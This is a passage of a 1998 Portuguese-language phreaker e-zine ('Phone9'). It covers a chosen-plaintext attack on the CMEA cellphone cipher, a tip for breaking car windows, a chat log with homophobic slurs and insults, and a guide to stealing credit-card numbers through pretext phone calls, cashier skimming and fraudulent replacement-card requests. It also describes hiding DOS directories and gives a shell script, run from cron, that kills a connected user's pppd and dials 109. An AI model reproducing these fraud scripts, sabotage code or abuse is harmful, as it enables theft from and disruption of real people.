cifrado $C_{0,\ldots,n-1)$, debaixo da chave $K_{0 \ldots 7)$ , como 
explicado abaixo :
	
$y_0 \leftarrow 0$ \\
for $i \leftarrow 0,\ldots,n-1$ \\
\qquad\=$P'_i \leftarrow P_i + T(y_i \oplus i)$ \\
\>$y_{i+1} \leftarrow y_i + P'_i$ \\
\\
for $i \leftarrow 0,\ldots,\lfloor \frac{n}{2} \rfloor -1$ \\
\>$P''_i \leftarrow P'_i \oplus (P'_{n-1-i} \lor 1)$ \\
\\
$z_0 \leftarrow 0$ \\
for $i \leftarrow 0,\ldots,n-1$ \\
\>$z_{i+1} \leftarrow z_i + P''_i$ \\
\>$C_i \leftarrow P''_i - T(z_i \oplus i)$ \\
	
	Aqui as operacoes tem sempre o seu lado oposto : $-$ $+$, sao uma 
adicao e subtracao do modulo 256, $\oplus$ padronizam o bit logico , ou 
entao sera substituido pela chave $T$ , entendendo o algoritimo , comecasse
o ataque

Nome : Chosen-Plaintext attack
Autor: David Wagner ,adaptado por Bruce Schneier 
----------------------------------------------------------------------------
Sabendo de todo o sistema de variaveis do algoritimo do CMEA , podemos falar
q o ataque chosen-palintext , ira preencher os 338 espacos disponiveis para
o $T$-box , este ataque soh ira funcionar no recentemente concertado bloco 
de caracteres $n>2$, tendo em mente de q o atacante nao toma controle sobre
o $n$ .
	
			-:[<: Atacking :>[ WEAKNESS ]:>]:-

Este ataque praticamente se auto-divide em dois passos :

Passo 1 :> primeiro recorendo ao $T(0)$, e entao recorendo aos espacos 
livres do $T$-box . Primeiro um aprende q o $T(0)$ com o $(256-92)/2=82$ 
(sendo $(256-92)/2=82$ um texto advinhado ou chutado!). Para cada acerto 
vamos dar $x$ dentro de um valor de $T(0)$ , obtendo a encriptacao da data,
$P=(1-x, 1-x, 1-x, \ldots)$, levando em conta q $P$ onde cada bit tem o 
valor de $1-x$, tendo um resultado da forma $C=(-x,\ldots)$ , o q nos leva 
ao resultado , obendo o maior probrabilidade de um $T(0)=x$ correto!

Passo 2 :> Um aprende todos os espacos e alocacoes na memoria do $T$-box$, 
com mais 256 textos escolhidos . Para cada byte $j$ , ira tentar advinhar o 
valor de $T(j)$, deixando o $k=((n-1) \oplus j) - (n-2)$ , onde ira 
deshabilitar o bloqueio do $n$ . Obtendo a encriptacao desta mensagem , 
$P=(1-T(0),1-T(0),\ldots,1-T(0),k-T(0),0)$; se o resultado estiver na forma
de $C=(t-T(0),\ldots)$ , entao nos chegamos a conclusao de q $T(j)$ = t$, 
descontando sempre a possibilidade de um erro por parte do LSB.

Pratica :> Supostamente uma pessoaq tenha o CMEA no seu celular , pode ser
persoazido por um hitechnikker , quebrando a encriptacao CMEA e pegando o 
numero do telefone a ser discado , isto sendo um ataque normal ,agora tbm 
existe a fase oposta , onde se eh possivel introduzir tons DTMF para dentro
do celular , causando uma ligacao sem a necessidade do teclado !

Mes q vem , eu irei explicar mais sobre CMEA , e vou mostrar mais 
detalhadamente como fazer um ataque chosen-plaintext baseado em um block de
2-bytes .

The blood root - reg (c) 1998 The Phone9 Communications Systems 
b0g no sistema CMEA de celulares
mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
[:> Tricks of The Trade! ......................................: various <:]

1a. Quebrando o vidro de um carro facilmente - by The Dert 
    --------- - ----- -- -- ----- ---------- - -- --- ----
-+
	Jah ouviu falar em bubina !? Eh , aquilo q tem de botam em postes e 
em carros , entao , pegue o seu carro , de umas voltas com ele pela sua 
cidade , depois abra o capo e cate uma bubina (soh faca isto se souber o q 
esta fazendo!), agora pega a bubina quente e apenas encoste no vidro , o
vidro comecara a rachar e ai eh soh empurra-lo para dentro

2a. Log da semana (Soul Hunter e Hacker The Pest podem gostar de ver isto)
    --- -- ------ ----- ------ - ------ --- ---- ----- ------ -- --- -----
								Loged by The Blood root :>>
-+

(03:03:19) FOLGAD+O fala para Curse_man: VOCE CALA BOCA HE HE HE 
(03:03:20) FOLGAD+O fala para Curse_man: VOCE CALA BOCA HE HE HE 
(03:03:31) Ðå®k•Måg¡¢™ : Entrei...
(03:03:35) FOLGAD+O fala para Phenom: VOCE TAMBEM CALA BOCA HE HE HE
(03:03:36) Fera Interior® : entra...
(03:03:38) Curse_man desculpa-se com FOLGAD+O: Foi mal mestre!!!!!!!!
(03:03:39) Fera Interior® : entra...
(03:04:16) Cu¦\¦hÆ diz p/ Fera Interior®: blz ai ???
(03:04:20) Swat : opa
(03:04:21) FOLGAD+O fala para Hacker The Pest!!!: SE QUER MESMO APRENDE PEGA
OS LIVROS DO AUTO CAD
(03:04:24) Fera Interior_ : entra...
(03:04:31) Hacker The Pest!!! fala para FOLGAD+O: Ah
(03:04:37) Hacker The Pest!!! fala para FOLGAD+O: vou comprar
(03:04:45) FOLGAD+O fala para Hacker The Pest!!!: N+O ESQUECE FALO AUTOCAD
(03:04:45) Phenom fala para FOLGAD+O: putz!!! hahahahaha
(03:04:48) Fera Interior_ diz p/ TODOS: que tombo..:o|
(03:05:03) Phenom fala para Fera Interior_: fala Fera!
(03:05:04) Curse_man fala para FOLGAD+O: Em livro de Auto CAD tem, NOSSA eu naum
sabia!
(03:05:05) Fera Interior_ diz p/ TODOS: DENOVO!!!
(03:05:07) FOLGAD+O fala para Hacker The Pest!!!: L- VOCE APRENDE TUDO E VAI
FICAR UMA FERA 
(03:05:15) Hacker The Pest!!! fala para FOLGAD+O: Mas o "RAQUER"
(03:05:17) Fera Interior_ diz p/ Cu¦\¦hÆ: e ai!
(03:05:28) Fera Interior_ diz p/ Hacker The Pest!!!: e ai!
(03:05:39) Fera Interior_ diz p/ Hammett: e ai!
(03:05:41) Hacker The Pest!!! fala para FOLGAD+O: AUTOCAD não é um livro que sua mãe
conta as aventuras dela com um cavalo?
(03:05:53) FOLGAD+O fala para Curse_man: COMPRA QUE + BOM ESSE LIVRO + CEM
POR CENTO OTIMO N+O TEM COMO N+O APRENDER
(03:05:58) Fera Interior_ diz p/ Phenom: fa;a i! blz?
(03:06:08) Hammett fala para Fera Interior: Blz!
(03:06:11) FOLGAD+O fala para Curse_man: HE HE HE 
(03:06:12) Cu¦\¦hÆ diz p/ Fera Interior®: blz fera !!! ++???
(03:06:13) SoUL HuNTeR [ £ í ñ µ × ] : Using UCS 0.904b - Entra na sala
(03:06:17) Fera Interior_ diz p/ Ý?Ý  : e ai!
(03:06:30) Fera Interior_ diz p/ SoUL HuNTeR [ £ í : æ!
(03:06:32) Swat fala para FOLGAD+O: putz...
(03:06:32) Curse_man surpreende-se com FOLGAD+O: VALEW PELA DICA, MR.
RAQUER!
(03:06:37) SoUL HuNTeR [ £ í ñ µ × ] fala para Fera Interior_: ae
(03:06:39) Hammett fala para Fera Interior_: ta usando o UCBD?
(03:06:47) FOLGAD+O fala para Hacker The Pest!!!: COITADO ACHO QUE NEM SABE
QUE LIVRO SE TRATA O AUTOCAD COMPRA QUE VOCE VAI VER COMO + BOM
ELE 
(03:07:00) Hacker The Pest!!! fala para Curse_man: Como assim?
(03:07:03) Fera Interior_ diz p/ Hammett: to naum..deus uns erros fatais....
(03:07:18) Hammett fala para Fera Interior_: heheheh! Isso é o maximo!
(03:07:22) Curse_man fala para Hacker The Pest!!!: Ela disse q vc tem um disqquete maldito!
(03:07:25) FOLGAD+O : FALO PESSOAL ESTOU FALANDO DEMAIS 
(03:07:40) Hacker The Pest!!! fala para Curse_man: Ahh
(03:07:44) Hammett fala para SoUL HuNTeR [ £ í : mano... recebeu minha question?
(03:07:48) Fera Interior_ diz p/ Hammett: o seu naum da naum?...ou arrumaram?
(03:07:48) Curse_man fala para Hacker The Pest!!!: E verdade?
(03:07:55) The Analist : Cumprimentos, galera!!!
(03:07:56) Hammett está usando Gateway Chat System 1.0 Beta 2.00: Disponivel brevemente
em http://www.gcs-chat.net
(03:07:56) FOLGAD+O : N+O ESQUECE QUE + LIVRO SOBRE AUTOCAD
(03:08:08) Curse_man fala para FOLGAD+O: CAI FORA DAKI!
(03:08:09) Adriano fala para FOLGAD+O: E aí Requerzão? ganhou o computador hoje e naum
tem + o q fazer?
(03:08:30) Hammett fala para SoUL HuNTeR [ £ í : uai! O port flood faz isso??????
(03:08:43) FOLGAD+O fala para Curse_man: APRENDE A MEXER DEPOIS CONVERSA
COMIGO FALO OT-RIO 
(03:08:57) Fera Interior_ diz p/ FOLGAD+O: falaram que vc é o hacker do pedaço!? verdade?
(03:09:09) Curse_man fala para FOLGAD+O: FALO!
(03:09:11) FOLGAD+O fala para Adriano: TU FICA NA MORAL MA+
(03:09:11) Swat fala para FOLGAD+O: vc é um panaca q usa um nick e c acha o fodao, c nunca
cato uma mina na vida, comeca a falar merda atraz de uma tela e acha q é homem, ehehehehe
(03:09:45) Adriano fala para FOLGAD+O: c nem conhece o teclado!!! eh MAN+!!!!
(03:09:49) Hammett fala para Swat: catar mina agora faz ganhar razao em discussao?
(03:10:00) Swat fala para FOLGAD+O: um gay revoltado, eheheheh
(03:10:06) Hacker The Pest!!! fala para FOLGAD+O: CARA + UM BEST SELER DIZ NA
CAPA A M+E DO FOLGAD+O E SUAS AVENTURAS COM CAVALO DE FOGO....
AUTOCAD
(03:10:25) Ý?Ý   fala para Fera Interior_: Fala ai mano...
(03:10:40) FOLGAD+O : FALO SEUS GAYS EU SEI QUE A VERDADE DÓI MAS ELA
TEM QUE SER DITA E VOCES S+O TODOS OT-RIOS HE HE HE 
(03:10:43) Hacker The Pest!!! fala para SoUL HuNTeR [ £ í : E DAI?
(03:10:56) Hammett fala para SoUL HuNTeR [ £ í : pensei que o port flood alem de conectar na
porta mandasse pacotes... e isso?
(03:10:57) Hacker The Pest!!! fala para SoUL HuNTeR: E ai o que aconteçe?
(03:10:58) FOLGAD+O grita com Hacker The Pest!!!: O QUE VOCE SABE MAN+
???
(03:11:15) Curse_man fala para FOLGAD+O: Vc ja ouviu falar em CorelDRAW?
(03:11:15) Hacker The Pest!!! fala para FOLGAD+O: Tudo o que aprendoi com você
(03:11:20) FOLGAD+O : HE HE HE 
(03:11:21) Hacker The Pest!!! fala para FOLGAD+O: Ser BICHA
(03:11:27) Hacker The Pest!!! fala para FOLGAD+O: IDIOTA 
(03:11:31) Hacker The Pest!!! fala para FOLGAD+O: E CHATO
(03:11:39) Hacker The Pest!!! fala para FOLGAD+O: AH E IMBECIL
(03:11:40) FOLGAD+O fala para Curse_man: NOSSA J- TENHO O COREL 8 PORQUE
(03:11:48) Swat fala para FOLGAD+O: para com essa molecagem, e da um fora...
(03:11:55) Hacker The Pest!!! fala para FOLGAD+O: O QUE QUE + ISSO CARA... UM
PROGRAMA HACKER?
(03:12:10) Curse_man fala para FOLGAD+O: Pq tem muitas coisas de Hack la tb, tem ate algo
de Phreak;;;;;
(03:12:23) Ý?Ý   fala para SoUL HuNTeR [ £ í : VC tá ocupado...??
(03:12:48) Ý?Ý   fala para Toe Jam FrostªÝ': C ta ainda vendo isto...??
(03:12:50) Nelson : Tem alguém aí que manja de Unix para me dar uma dica ?. Se não quizer dar,
vender. Estou disposto a pagar.
(03:12:54) Hammett fala para Curse_man: realmente, parece que o carinha q entrou na NASA
tava usando o CorelDRAW.. 
(03:13:20) Curse_man fala para FOLGAD+O: C sabe invadi com ele?
(03:13:20) Hacker The Pest!!! fala para FOLGAD+O: quem ta conectado na global one?
(03:13:23) FOLGAD+O1 : SEUS MAN+ BURROS N+O SABE MEXER PORRA
NENHUMA ACHO QUE NEM SABIA QUE EXISTIA O COREL 8 
(03:13:48) Hammett fala para FOLGAD+O1: hahahahaha!
(03:14:26) Curse_man fala para FOLGAD+O: So vc naum sabia!
(03:14:37) Hacker The Pest!!! fala para FOLGAD+O: O Mister Raquer... de merda... Vc sabe o
que é ppp?
(03:14:39) Ý?Ý   fala para Nelson: Fica + em conta c pesquisar em HP...E vaias otimas sob isto...
(03:14:40) FOLGAD+O1 : HA HA HA HA O QUE OT-RIOS APRENDER A MEXER
PRIMEIRO EM VEZ DE FICA TENTANDO HACKEAR QUE ISTO N+O LEVA A NADA
ISSO SSIM
(03:14:41) Hacker The Pest!!! fala para FOLGAD+O: Ou IP?
(03:14:56) Hacker The Pest!!! fala para FOLGAD+O: Proxy?
(03:15:13) Ý?Ý   fala para SoUL HuNTeR [ £ í : C tá acupado..??
(03:15:14) Hacker The Pest!!! fala para FOLGAD+O: Ih cara YOU are SHIT!
(03:15:36) Hammett : Ah! Esse carinha deu sono.... inté mais!
(03:16:12) SoUL HuNTeR [ £ í ñ µ × ] muda de nick para Soul Hunter
(03:16:14) Soul Hunter fala para ø?øÿ: nao
(03:16:29) Black Sheep : entra na sala...
(03:16:39) APAVORANDO : HEHE HE 
(03:16:52) Hammett fala para Nelson: ta usando TCP/IP ou IPX?
(03:16:55) APAVORANDO : ESTOU APAVORANDO OS OT-RIOS DA SALA 
(03:17:19) APAVORANDO : FALO PESSOAL EU SOU O FOLGADO E AT+ OUTRO DIA 
(03:17:22) Fera Interior_ diz p/ Phenom: ou ele saiu, caiu..sei la..acabou de ficar off....
(03:17:39) APAVORANDO : ACABOU O QUE SEU OT-RIO ESTOU AQUI COMO
APAVORANDO 
(03:17:42) SoUL HuNTeR [ £ í ñ µ × ] : Using UCS 0.904b - Entra na sala
(03:18:01) APAVORANDO : HEHE HE 
(03:18:02) Phenom fala para Fera Interior_: ta ok, valeu
(03:18:06) Nelson fala para Hammett: TCP/IP
(03:18:13) Curse_man fala para Nelson: O meu deu a mesma coisa1
(03:18:15) APAVORANDO : ESSES OT-RIO + FODA
(03:18:22) Hammett fala para Nelson: chama um padre, ou um pai de santo.... :)
(03:18:33) SoUL HuNTeR [ £ í ñ µ × ] fala para ø?ø: ta
(03:18:40) Hammett : Inté mais!
(03:18:49) APAVORANDO fala para Hacker The Pest!!!: FALO OUTRO DIA VOCE ME
ENSINA A MEXER NO PAINT FALO PORQUE + FODA AQUILO
(03:19:10) SoUL HuNTeR [ £ í ñ µ × ] fala para APAVORANDO: a UOL eh uma bosta... just
like you..
(03:19:20) Nelson : Tem uns caras que ficam babando pelo UNIX, mas ele desgraçou minha vida.
(03:19:21) APAVORANDO : PORRA AQUILO + FODA MEXER NO PAINT 
(03:19:22) APAVORANDO : PORRA AQUILO + FODA MEXER NO PAINT 
(03:19:50) SoUL HuNTeR [ £ í ñ µ × ] fala para ø?øÿ: fica online
(03:19:55) «¥§‡Alfredo‡§¥+ : e ai galera !
(03:20:08) Adriano grita com APAVORANDO: para o seu imenso vacuo encefálico
pait eh phoda mesmo!!!
(03:20:15) APAVORANDO : VOU ESTUDAR UM POUCO PARA VER SE CONSIGO
APRENDER A DESLIGAR O COMPUTADOR ISSO SIM 
(03:20:22) Hacker The Pest!!! fala para APAVORANDO: + CARA PODIS CR-
(03:20:40) APAVORANDO fala para Hacker The Pest!!!: TU TEM COREL 8 A- 
(03:20:59) APAVORANDO fala para Hacker The Pest!!!: SABIA QUE EXISTE O COREL 8
???
(03:21:07) Hacker The Pest!!! fala para APAVORANDO: N+O...
(03:21:13) Ý?Ý   fala para SoUL HuNTeR [ £ í : Falou...
(03:21:16) Ý?Ý   fala para SoUL HuNTeR [ £ í : Falou...

(03:21:22) APAVORANDO fala para Hacker The Pest!!!: POXA QUE PENA 
(03:21:23) Hacker The Pest!!! fala para APAVORANDO: EU SABIA QUE EXISTE O COREL
5
(03:21:25) APAVORANDO fala para Hacker The Pest!!!: POXA QUE PENA 
(03:21:29) Fera Interior_ diz p/ Phenom: ja perguntei.esperando a resposta....wait wait wait
(03:21:34) Nelson fala para Blood root: Boa dica cara. Vou tentar. Se der certo, vou te pagar.
Como faço para isso ?
(03:21:34) SoUL HuNTeR [ £ í ñ µ × ] fala para ø?øÿ: fica online!!!
(03:21:37) Fera Interior_ diz p/ Phenom: :o)
(03:21:45) SoUL HuNTeR [ £ í ñ µ × ] fala para Bloodroot: manda a auth denovo
(03:22:01) Ý?Ý   fala para SoUL HuNTeR [ £ í : Espera q tá travando tudo ..Vou resetar..è um
instante..Espera..??
(03:22:03) Phenom fala para Fera Interior_: ok, hehehe
(03:22:06) APAVORANDO fala para Phenom: ISSO AI FICA QUIETO COMO EU FALEI
(03:22:11) SoUL HuNTeR [ £ í ñ µ × ] fala para ø?øÿÿ : espero..
(03:22:14) Menininha : entra na sala...
(03:22:31) APAVORANDO : OUTRO DIA EU VOLTO PARA APRENDER MAIS COISAS 
(03:22:38) Ý?Ý   fala para Toe Jam FrostªÝ': Vou resatar..Espera..
(03:22:41) Toe Jam FrostªÝ' grita com TODOS: desisto......!!!! : / num me intendo!!!!
(03:22:54) Fera Interior_ diz p/ Phenom: ele falou que nunca ouviu falar!! e que vc é um otario!!
rediculo!!!
(03:23:02) APAVORANDO grita com Hacker The Pest!!!: OBRIGADO POR TER ME
ENSINADO A FAZER CIRCULO NO PAINT 
(03:23:03) Fera Interior_ diz p/ Phenom: brincadeira!!! heheheh
(03:23:09) Toe Jam FrostªÝ' grita com Ý?Ý  : falô...
(03:23:13) Hacker The Pest!!! fala para SoUL HuNTeR: por qye me mandou dar um ping
naquele ip?
(03:23:30) APAVORANDO grita com Hacker The Pest!!!: OUTRO DIA VOCE PODE
ME ENSINAR A COLOCAR LETRAS NO WORD CARA???
(03:23:33) Phenom fala para Fera Interior_: ???
(03:23:37) Fera Interior_ diz p/ Phenom: ele falou que lembra.....e falou que lembra de vc
tb.....quer o uin dele?
(03:23:40) SoUL HuNTeR [ £ í ñ µ × ] fala para Hacker The Pest!!!: flood
(03:23:56) Phenom fala para Fera Interior_: quero, dá aí, faz favor!
(03:24:17) Phenom fala para Fera Interior_: levei um susto com akela mensagem, hehehe
(03:24:37) Adriano fala para APAVORANDO: nao adianta te ensinarem nada... c vai acabar
como a sua mae... rodando bolsinha!!!
(03:24:39) Black Sheep fala para Soul Hunter: vc conhece algum programa de ping para nt ou 95
que de para escolher a porta a ser pingada?]
(03:25:38) Fera Interior_ diz p/ Phenom: heheheh chegou ai?
(03:25:41) FOLGANDO fala para Adriano: FALANDO EM RODAR BOLSINHA OUTRO
DIA EU COMI A TUA M+E E ELA ESTAVA NA AUGUSTA SÓ DE CALSINHA 
(03:25:41) SoUL HuNTeR [ £ í ñ µ × ] fala para Black Sheep: mas ping eh so uma porta.... nao
tem como pingar outra porta
(03:25:55) Phenom fala para Fera Interior_: chegô!
(03:26:04) Adriano fala para APAVORANDO: Hahaha!!!
(03:26:05) Fera Interior_ diz p/ Phenom: blz...:o)
(03:26:08) The Analist : Alguém aqui entende bem de estrutura fisica/logica de um provedor de
acesso?
(03:26:48) FOLGANDO : HE HE HE 
(03:26:48) Toe Jam FrostªÝ' grita com TODOS: fui.....
(03:27:10) FOLGANDO : CHEGA DE ESTUDAR MINHA CABEÇA EST- DOENDO
MUITO 
(03:27:26) AngelSpirit : ALGUEM SABE O END DA JANE??
(03:27:27) Hacker The Pest!!! fala para SoUL HuNTeR: Deu bad não sei o que lá
(03:27:55) FOLGANDO : FALO PESSOAL 
(03:27:57) AngelSpirit grita com TODOS: ALGUEM SABE O END DA JANE??
(03:28:01) Black Sheep fala para SoUL HuNTeR [ £ í : tem !!porque tem algumas portas do linux
e do nt e 95 que vc so dda um ping o cara ja desconecta!
(03:28:03) SoUL HuNTeR [ £ í ñ µ × ] fala para Black Sheep : acho que ping eh icmp/8 com
resposta na 0 ou 3
(03:28:22) FOLGADO : OPS 
(03:28:32) FOLGADO : VOCES EST+O BRAVOS????
(03:28:37) AngelSpirit grita com TODOS: EU ME LEMBRO D ALGO TIPO
???.COM.BR/ENDER...
(03:28:48) AngelSpirit grita com TODOS: ALGUEM SABE??
(03:29:01) Ý?Ý   fala para SoUL HuNTeR [ £ í : Voltei ..POde passar...
(03:29:10) FOLGADO : J- QUE N+O EST+O BRAVOS AT+ OUTRO DIA
(03:29:11) Ý?Ý   fala para Toe Jam FrostªÝ': Voltei...
(03:29:36) AngelSpirit grita com TODOS: ALGUEM SABE??
(03:29:43) AngelSpirit grita com TODOS: FALOW!!
(03:29:55) FOLGADO : FUUUIIIIIIIIIIII TAMBEMMMMM
(03:30:22) SoUL HuNTeR [ £ í ñ µ × ] fala para Black Sheep: nao. ping eh so uma porta.... se for
outranao eh ping
(03:30:22) Ý?Ý   fala para Toe Jam FrostªÝ': Vc tá aki...??
(03:30:30) SoUL HuNTeR [ £ í ñ µ × ] fala para ø?øÿ: ok perae
(03:30:58) Black Sheep fala para SoUL HuNTeR [ £ í : num sei e coisa do tipo!ou um flooder
que da para escolher a porta!
(03:31:38) Fera Interior® : entra...
(03:31:38) Ý?Ý   fala para SoUL HuNTeR [ £ í : Falou tô perando...
(03:31:38) Ý?Ý   : Falou tô perando...
(03:31:39) SoUL HuNTeR [ £ í ñ µ × ] : Using UCS 0.904b - Entra na sala
(03:31:40) SoUL HuNTeR [ £ í ñ µ × ] fala para Black Sheep: ahh tem muitos. que fazem isso
(03:31:40) Ý?Ý   fala para SoUL HuNTeR [ £ í : Falou tô perando...
(03:31:41) SoUL HuNTeR [ £ í ñ µ × ] fala para ø?ø: perae que reiniciei o icq
(03:31:48) Phenom : ouviram do ipiranga as margens plácidas
(03:31:48) Ý?Ý   fala para SoUL HuNTeR [ £ í : Falou tô perando...
(03:31:58) SoUL HuNTeR [ £ í ñ µ × ] fala para Bobinho: nao.. acho que warp nao ponho... nem
ruindows
(03:32:10) Papilon® : entra na sala...
(03:32:16) SoUL HuNTeR [ £ í ñ µ × ] fala para Bobinho: nao Visual Age nao vem.. nem lembro
o que eh
(03:32:49) Phenom : retumbante.....
(03:32:50) Black Sheep fala para SoUL HuNTeR [ £ í : eu to prescisando de um flooder bom
mesmo que de para escolher a porta e o tal de dolly vc conhece?aaa!!!!!!!lembrei to atras do jane
tb!
(03:32:54) Hacker The Pest!!! fala para SoUL HuNTeR: Cara seu flooder do icq não ta
funcionando
(03:33:01) SoUL HuNTeR [ £ í ñ µ × ] fala para Phenom: ta no banheiro :)
(03:33:03) Phenom : pátria amada Brasil
(03:33:11) Phenom : EEEEEEEEEE

Cada um q me aparece .... TSC.. TSC...TSC..TSC

3a. Como ganhar 2 reais e se tornar um milionario - by The blood root
    ---- ------ - ----- - -- ------ -- ----------   -- --- ----- ----
-+
	Eu acabei de terminar o meu mais novo manual , desta vez ele foi 
impresso e esta sendo vendido sobre a editora MERDEL (fazendo uma pequena
ironizacao da editora MANTEL, q tbm eh uma merda!), neste livro eu exponho
as minhas mais novas facanhas e atos q eu uso para me tornar o milionario q 
hoje sou !

	Para adquirir o livro "Little Tricks , big wh0re's" , basta enviar 
2 dolares para o endereco a seguir :

	Rua. Teodoro da Silva, 907 - Grajau
	Rio de janeiro - CEP 20563-900

	<- Aos cuidados de Marcos Wettreinch ->

	Qquer duvida leia o FAQ apos comprar o livro !

4a. Obtendo uns cartoes de credito - (anarcotelcodumbaphreakinganticristo) 
    ------- --- ------- -- ------- - -------------------------------------
-+

	Esta vai deixar o pessoal da VISA e empresas de cartao de credito ,
pirados , 3 manieras facilimas de se conseguir numeros ou cartoes de credito
de outras pessoas .

1- Tem q ter voz de gala de novela , ligue para casa de um simplorio lamer ,
   nao conhece nenhum !? ligue para (021)287-8553, depois de ligar este 
   numero ,diga q esta vendendo produtos de beleza (peca para falar com uma 
   muie!)para o cabelo , ultima linha da Wella Bom ,  faca parecer algo q 
   realmente exista , invente algo como "Troca de coloracao natural da Cera
   Ceramidas do cabelo!", antes de desligar , peca soh para constar no 
   cadastro , o seu endereco , telefone e..... (olhe como se deve ser feito)

 Boa tarde , aqui eh dah empresa CeraCeramidasDoCao , eu poderia falar 
     com o maior da casa
 Vc quer dizer , minha mae !?
 Sim , por favor , pode coloca-la no telefone!
 Um minutinho
------[ O mulek corre , e berra (MAINHEEEEEEEEEEE! Telefone!) ]-------------
 Alo , com quem estou falando !?
 Elizabeth de Monis
 Senhora Monis , aqui quem fala eh Carlos Eduardo da Empresa 
     CraCeramidasDoCao , nos estamos ligando para lhe informar do nosso mais
     novo produto
 Humm....
 Saido do laboratorios da Wella BOM-Bril , ele ira otimizar as ceramidas
     do seu cabelo , por acaso a senhora estaria enterecado em uma amostra 
     gratis !?
 Sim... claro q sim!
 Eu irei precisar do seu Nome , endereco , CEP (pergunte se quiser 
     perder tempo).
 Claro ....dddadaad.....dudududud......didididid.....dododod!
 Ah! Jah ia me esquecendo , o numero do seu cartao de credito para 
     compras futuras!
 A , um momento , 3456 3456 3456 3456 
 Brigado , sua puta!

	Isto ira funcionar , 50% das vezes , caso o 2878553 nao funciona , vah 
tentando 2878550 , 2878552 , 2878553 , etc... etc...!

2. (Se vc trabalha!)

	Vc trabalha (se nao trabalha , pule para a terceira vagabundo!) de 
preferencia loja de roupa , espere aquela compradora patolina entrar na loja
faca com q ela compre merda com o CC dela! Quando ela te der o CC , diga q 
vai confirmar o numero comm a central , e anote o numero , isto ira garantir
pizza por um final de semana todo!

3. Vizinho , burro , estupido e canalha!

	Primeiro , arrume um vizinho , burro , estupido e canalha , depois de 
arrumar um , procure saber qual o CC dele , aproveite e anote o CEP , 
endereco , nome completo dele e data de nascimento , agora ligue para a cede
de atendimento do cartao do cara e fale assim :

 Bom dia , o meu cartao foi roubado , e eu gostaria de receber um novo!
 Um momento
 sim!
 Qual o seu nome !?
 Joselino Kleiniton Da Silva
 endereco!
 Rua. Dos merdas , 198 , cob
 Data de nascimento 
 12/12/1912
 Otimo , o seu cartao sera recebido em poucos dias!

PS.: Soh funciona em caso extremo de burrice aguda por meio de operadores,
o q eu afirmo e repito nao eh impossivel de se achar!

==[ Para alegrar a meninada , na proxima edicao , eu vou liberar o Guia ]==
==[ Completo de uso de seguro de numeros de cartoes de credito roubados ]==
==[ totalmente , completamente e inteiramente escrito por The blood root]==
==[ e a galera da DP-16 , Acid Branch , e The dert, tbm entraram na w4r ]==

5a. Escondendo arquivos no DOS - by CodeBlaster
    ---------- -------- -- ---   -- -----------

Vc pode esconder diretorios e arquivos q nao podem ser acessados pelo 
windows usando um simples char , setando-o para char 255no inicio ou no 
final do diretorio .

[Criando diretorio]
c:\> md phone9[ALT+255]

[ALT+255] quer dizer , segure o ALT e aperte 255 no teclado numerico!

[Para acessar o diretorio]
c:\> cd phone9[ALT+255]
c:\>phone9 >dir/w

  O volume da unidade C eh Phone9
  O numero de serie do volume e 3F53-23F2
  Diretorio de C:\phone9

  [.] 	[..]
	0 arquivo(s)		0 bytes
	2 diretorio(s) 82 427 000 bytes livres

c:\>phone9 >

	Agora com um programa em basic by CodeBlaster , vc pode copiar qquer
aquivo de qquer char , por exemplo espaco , em qquer diretorio , do windows
ou DOS :

:>[ Copy CHAR files.bas ]<:::::::::::::::::::::::::::::::[ by Codeblaster]<:
INPUT "Digite o nome do arquivo: ", arquivo$
INPUT "Novo nome do arquivo: ", novonome$
OPEN arquivo$ FOR INPUT AS #1
OPEN novonome$ FOR OUTPUT AS #2
DO
 LINE INPUT #1, a$
 PRINT #2, a$
LOOP UNTIL (EOF(1))
:>[ Copy CHAR files.bas ]<:::::::::::::::::::::::::::::::[ by CodeBlaster]<:

6a. 109 script - The blood root
    --- ------   --- ----- ---- 

	Este eh um script bastante util , q eu fiz , baseado em um script 
feito por dk , com uma pequena modificacao por parte minha ! 
thanx man! Seja como for ai esta o codigo , quem sabe , sabera o q ira 
acontecer com o sistema. A cada 1 minuto, o telefone liga 109 e desliga, mas
o melhor eh se o cra estiver na internet, ele simplesmente caira pois o 
comando kill, vai killar o pppd dele, fazendo-o cair da inet e logo depois,
ligar 109 e desligar! 
(Mude os daemons para a versao do seu unix!)
:>[ 109.sh ]<::::::::::::::::::::::::::::::::::::::::[ by The blood root ]<:
#/bin/sh
#thanx to dk - keep str0ng dude!
#(c) - 1998, The blood root
#blood@puruca.com.br - http://www.puruca.com.br/phone9
#adcione esta linha ao Crontab
#1,2,3,4,5,6,7,8,9 * * * /caminho/para/109.sh
echo '==[ 109 Script For Horny Shells ]=='
echo '(c) The blood root & dk - '
echo '==[ 109 Script For Horny Shells ]=='
echo ''
echo '	get $localhost 0.0.0.0' >> /tmp/109.dip
echo '	get $remote 0.0.0.0' >> /tmp/109.dip
echo '  	port modem'	>> /tmp/109.dip
echo '	speed 38400' >> /tmp/109.dip
echo '	reset' >> /tmp/109.dip
echo '	send ATQ0V1E1X4\r' >> /tmp/109.dip
echo '	wait OK 2' >> /tmp/109.dip
echo '	dial 109' >> /tmp/109 

ps -aux|grep pppd|grep -v grep >> /tmp/ppp-cheking.tokill

grep "^root" /tmp/ppp-cheking.tokill
if [ $? -ne 0 ]; then
	echo "PPP kilado!" >> /tmp/ppp-kill
fi

if [ -f /tmp/ppp-kill ]; then
     /sbin/dip /tmp/109
     rm /tmp/ppp-*
     rm /tmp/109.dip
     exit 1
fi

kill `ps -aux|grep pppd|grep -v grep|awk 'BEGIN {FS=" ";OFS=" "} {print $1}`
/sbin/dip /tmp/dip
rm /tmp/pp-*
rm /tmp/109.dip
exit 1

mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
[:> Info-seeker - GSM Systems .........................: The Phone9 Team <:]

The Phone9 Communications Systems
reg - (c) 1998, Productions
presents...

				   Info Seeker 0.1
				     
				     GSM systems 

:>[ GSM systems ]<::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
The Phone9 Communications Systems Productions
Presents...			The GSM Systems 

Text by The Phone9 Research Team
Broadcast & Home-page by The Puruca's Web Page

Official Web page9 : http://www.puruca.com.br/phone9
Official Mail9     : phone9@thepentagon.com

The Info-seeker c0ntact : http://www.puruca.com.br/phone9/info-seek/
Info-seeker mail        : info-seeker@thepentagon.com

Thanx to :
